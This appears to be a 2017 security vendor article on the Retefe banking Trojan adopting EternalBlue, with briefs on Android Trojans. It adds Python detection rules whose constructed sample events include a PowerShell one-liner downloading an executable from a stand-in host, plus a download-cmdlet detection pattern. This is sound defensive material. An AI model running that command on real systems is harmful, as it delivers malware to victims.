Retefe Banking Malware Starts Leveraging EternalBlue

September 28, 2017

A recent upgrade to the propagation capabilities of the Retefe banking Trojan (detected by Trend Micro as TROJ_RETEFE.ASUAN), along with several other developments in the banking malware landscape this month, shows how malware developers are ramping up their operations.

A recent report details how the developers behind Retefe added new functionality to the malware that leverages EternalBlue (addressed by MS17-010), the infamous SMB exploit behind the WannaCry and Petya ransomware attacks. Retefe is not the first banking Trojan to upgrade its propagation techniques: TrickBot and Emotet also took inspiration from the WannaCry and Petya outbreaks.

Security researchers noted that this new spate of Retefe campaigns has been spreading across different regions over the past few months. The malware typically targets users in Austria, Sweden, Switzerland and Japan, and more recently the United Kingdom. It is distributed by malicious emails carrying “.lnk” shortcut attachments. If the attachment is opened and the user grants permission, a PowerShell command runs and downloads a self-extracting archive hosted on a remote server. The archive contains an obfuscated JavaScript installer that implements the EternalBlue exploit; the EternalBlue component then downloads a PowerShell script which installs Retefe. Most other banking Trojans steal credentials with fake login pages overlaid on legitimate sites, but Retefe instead modifies the computer’s proxy settings so that traffic to targeted sites is redirected to malicious sites hosted on servers under the attackers’ control.

Reports note that on September 20, the implementation of EternalBlue was modified and the module responsible for lateral spreading was removed, “thus avoiding an infinite spreading loop”.
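The delivery chain and the proxy tampering described above, plus the lateral SMB spreading that the September 20 change removed, translate into three host-level detections. The following is an added example written for this page, not code from the report or from Trend Micro; it runs rule logic over constructed Sysmon-style events (the field names, the allow-list of processes permitted to write proxy settings, the fan-out threshold of five SMB peers, and the reading of Retefe's proxy change as a write to AutoConfigURL/ProxyServer under Internet Settings are all assumptions to tune against your own telemetry). Rule 1 assumes the shortcut was opened from Explorer; if your mail client launches .lnk targets directly, add its image name to the parent check.

```python
"""Detection rules for the Retefe delivery chain described in the article.

Added example: constructed Sysmon-like events (dicts) stand in for real
telemetry. Field names and thresholds are assumptions, not a vendor schema.
"""
import re
from collections import defaultdict

# Rule 1: download primitives commonly seen in a .lnk-launched PowerShell one-liner.
DOWNLOAD_CMDLETS = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|start-bitstransfer|net\.webclient",
    re.IGNORECASE,
)
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Rule 2: per-user proxy settings (assumed location of the values Retefe rewrites).
INTERNET_SETTINGS = "\\software\\microsoft\\windows\\currentversion\\internet settings\\"
PROXY_VALUES = {"autoconfigurl", "proxyserver", "proxyenable"}
PROXY_WRITERS_ALLOWED = {"explorer.exe", "rundll32.exe", "svchost.exe"}  # assumed allow-list

# Rule 3: distinct SMB (445) peers one process must contact before we call it spreading.
SMB_FANOUT_THRESHOLD = 5  # assumed; tune per estate


def image_name(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def check_process(ev: dict):
    """Rule 1: explorer.exe (a double-clicked .lnk) spawning PowerShell that fetches a payload."""
    if ev.get("type") != "process_create":
        return None
    if image_name(ev["image"]) not in POWERSHELL_IMAGES:
        return None
    if image_name(ev["parent_image"]) != "explorer.exe":
        return None
    if not DOWNLOAD_CMDLETS.search(ev["command_line"]):
        return None
    return ("lnk_powershell_download", ev["host"], ev["command_line"])


def check_registry(ev: dict):
    """Rule 2: proxy settings rewritten by a process that is not on the allow-list."""
    if ev.get("type") != "registry_set":
        return None
    key = ev["target"].lower()
    if INTERNET_SETTINGS not in key:
        return None
    value = key.rsplit("\\", 1)[-1]
    if value not in PROXY_VALUES:
        return None
    writer = image_name(ev["image"])
    if writer in PROXY_WRITERS_ALLOWED:
        return None
    return ("proxy_settings_tampered", ev["host"], f"{writer} set {value}={ev['data']}")


def check_smb_fanout(events: list):
    """Rule 3: one process opening SMB to many peers, the shape of EternalBlue-style spreading."""
    peers = defaultdict(set)
    for ev in events:
        if ev.get("type") == "network_connect" and ev.get("dst_port") == 445:
            peers[(ev["host"], image_name(ev["image"]))].add(ev["dst_ip"])
    return [("smb_fanout", host, f"{image} -> {len(ips)} hosts on 445")
            for (host, image), ips in peers.items() if len(ips) >= SMB_FANOUT_THRESHOLD]


def run_rules(events: list):
    """Apply every rule; return a list of (rule, host, detail) hits."""
    hits = []
    for ev in events:
        for rule in (check_process, check_registry):
            hit = rule(ev)
            if hit:
                hits.append(hit)
    hits.extend(check_smb_fanout(events))
    return hits


# Constructed sample telemetry (not real logs): WS01 is the infected host.
SAMPLE_EVENTS = [
    {"type": "process_create", "host": "WS01", "parent_image": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "command_line": "powershell.exe -w hidden -c (New-Object Net.WebClient).DownloadFile("
                     "'http://example.invalid/a.exe','%TEMP%\\a.exe')"},
    {"type": "process_create", "host": "WS01", "parent_image": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\notepad.exe", "command_line": "notepad.exe readme.txt"},
    {"type": "registry_set", "host": "WS01", "image": "C:\\Users\\u\\AppData\\Local\\Temp\\a.exe",
     "target": "HKU\\S-1-5-21-1\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoConfigURL",
     "data": "http://example.invalid/proxy.pac"},
    {"type": "registry_set", "host": "WS01", "image": "C:\\Windows\\explorer.exe",
     "target": "HKU\\S-1-5-21-1\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyEnable",
     "data": "0"},
] + [
    {"type": "network_connect", "host": "WS01", "image": "C:\\Users\\u\\AppData\\Local\\Temp\\a.exe",
     "dst_ip": f"10.0.0.{n}", "dst_port": 445} for n in range(10, 17)
] + [
    {"type": "network_connect", "host": "WS02", "image": "C:\\Windows\\System32\\svchost.exe",
     "dst_ip": "10.0.0.5", "dst_port": 445},
]

if __name__ == "__main__":
    for rule, host, detail in run_rules(SAMPLE_EVENTS):
        print(f"[{rule}] {host}: {detail}")
```

Rule 3 is the one that stops firing after the September 20 change, which is exactly why it should be kept: an infection that no longer fans out over 445 still trips rules 1 and 2, and a return of the spreading module shows up again as fan-out.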

This month’s banking malware landscape

Early this month, a new Android banking Trojan called Red Alert 2.0 was also ramping up operations, spreading through third-party app stores. It targets banking and social apps: once installed, it draws an overlay over the legitimate app to capture user credentials, which it passes to a remote server. Red Alert 2.0 also blocks incoming calls from banks, presumably to defeat verification calls and fraud notifications.

This month also saw an update to the BankBot malware. BankBot is quite similar to Red Alert: it uses fake overlay screens to steal user credentials and can also hijack and intercept SMS messages, which lets it bypass SMS-based two-factor authentication. The newer BankBot targets legitimate apps from banks in 27 countries, and ten United Arab Emirates (UAE) banking apps were added to its target list.

Cybercriminals are constantly developing and adding functionality to their malware, and users should be equally vigilant. EternalBlue exploits a known vulnerability, and a patch (MS17-010) has been available since March 2017. Users can stay protected by keeping their operating systems updated and using multilayered security solutions.

Email and web gateway solutions such as Trend Micro™ Deep Discovery™ Email Inspector and InterScan™ Web Security can prevent malware from ever reaching end users. At the endpoint level, Trend Micro Smart Protection Suites deliver several capabilities, such as high-fidelity machine learning, web reputation services, behavior monitoring, application control and vulnerability shielding, that minimize the impact of this threat. Trend Micro Endpoint Sensor will also be effective in monitoring processes or events that trigger malicious activity.

Trend Micro™ Deep Discovery™ Inspector can detect connections to malicious C&C and help quickly identify the impacted machines on networks, while Trend Micro™ Deep Security™ can stop MS17-010 exploits from the network through its IPS technology.

For small businesses, Trend Micro Worry-Free Services Advanced offers cloud-based email gateway security through Hosted Email Security. Its endpoint protection also delivers several capabilities, such as behavior monitoring and real-time web reputation, in order to detect and block ransomware.

All solutions are powered by XGen™ endpoint security, which infuses high-fidelity machine learning with other detection technologies and global threat intelligence for comprehensive protection against advanced malware.
